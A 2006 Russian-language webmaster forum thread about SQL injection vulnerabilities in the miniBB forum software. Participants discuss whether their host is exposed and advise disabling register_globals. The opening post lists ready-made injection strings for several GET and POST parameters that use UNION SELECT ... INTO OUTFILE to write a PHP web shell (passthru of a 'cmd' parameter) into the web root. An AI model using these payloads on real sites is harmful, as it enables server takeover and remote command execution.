 |
Форум вебмастеров на AlfaSpace.NET / The Matrix Has You / Уязвимости в МиниВВ |
| Автор | Сообщение |
| orc Soul keeper  314 |
# Дата: 20 Май 2006 14:22 Вот что я нашёл на запрос minibb (хотел скачать) а там про уязвимости в нём (и 1 результат!). Надеюсь это пофиксено на альфе: 1. SQL Injection (GET)
Не фильтруется параметр confirmCode. /index.php?action=confirmpasswd&confirmCode=f' union select '<? passthru($_GET[cmd]) ?>' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/* Не фильтруется параметр post. /index.php?action=delmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE '/tmp/passwd'/* /index.php?action=editmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE '/tmp/passwd'/* 2. SQL Injection (POST) Не фильтруется user_usr. user_usr=f' union select '<? passthru($_GET[cmd]) ?>','123' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/* /?action=sendpass Не фильтруется email. email=f' union select 0,0,'<? passthru($_GET[cmd]) ?>' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/* /?action=registernew Не фильтруется login и email. login||email=1' union select 1 from mysql.user INTO OUTFILE '/tmp/passwd'/* В случае, если: злоумышленник знает полный путь к каталогу, в котором размещен контент; magic_quotes_gpc=off; пользователь, с чьими правами идет обращение к БД имеет права File_priv; создание файла в пределах каталога web-сервера или за его приделами разрешено пользователю от имени которого работает БД; то, он может перезаписать произвольные файлы или создать web-shell. |
| Андрей Алексеевич  2125 |
# Дата: 20 Май 2006 14:25 Union неполучится, на альфе версия MySQL старая. |
| orc Soul keeper 314 |
# Дата: 20 Май 2006 14:26 Андрей Уже хоть это радует |
| Константин TorrentMaster 3449 |
# Дата: 20 Май 2006 16:55 ° Поправил: Константин orc Это все работает, как и многие "другие уязвимости минибб" лишь при включенном регистр глобалс + magic_quotes_gpc=0. На альфе последнее стоит в 1, а первое в 0. |
| orc Soul keeper 314 |
# Дата: 2 Июн 2006 12:29 Константин это хорошо тока ты перепахивал систему (миниВВ) пд выключеные регистр глобалс? |
| smallcms Участник 2754 |
# Дата: 2 Июн 2006 15:59 orc » orc ты перепахивал систему (миниВВ) пд выключеные регистр глобалспо другому в интернете нельзя работать. 60% взломов - неправильные настройки серверной части. и имхо 38% - грубые недочёты двигов. |
| orc Soul keeper 314 |
# Дата: 3 Июн 2006 01:32 Поделитесь плиз опытом - что и где надо поменять. |
| Михаил Я знаю людей...  2551 |
# Дата: 3 Июн 2006 01:51 » orc Поделитесь плиз опытом Да, действительно. Я тут собираю MiniBB 2.0 RC6 Full Mods, и хотел бы обезопасить. |
| orc Soul keeper 314 |
# Дата: 3 Июн 2006 10:33 Михаил Выложиш для скачки, а то самому париться... |
| smallcms Участник 2754 |
# Дата: 3 Июн 2006 14:19 » orc Поделитесь плиз опытом - что и где надо поменять.» Михаил Да, действительно. Я тут собираю MiniBB 2.0 RC6 Full Mods, и хотел бы обезопасить.самый безопасный - со всеми модами от Дефа. но если ты зальёшь на хост с register globals = on - грош цена всем стараниям. вот я о чём. не всегда в скриптах дело... |
![[Valid RSS]](valid-rss.png "Validate my RSS feed")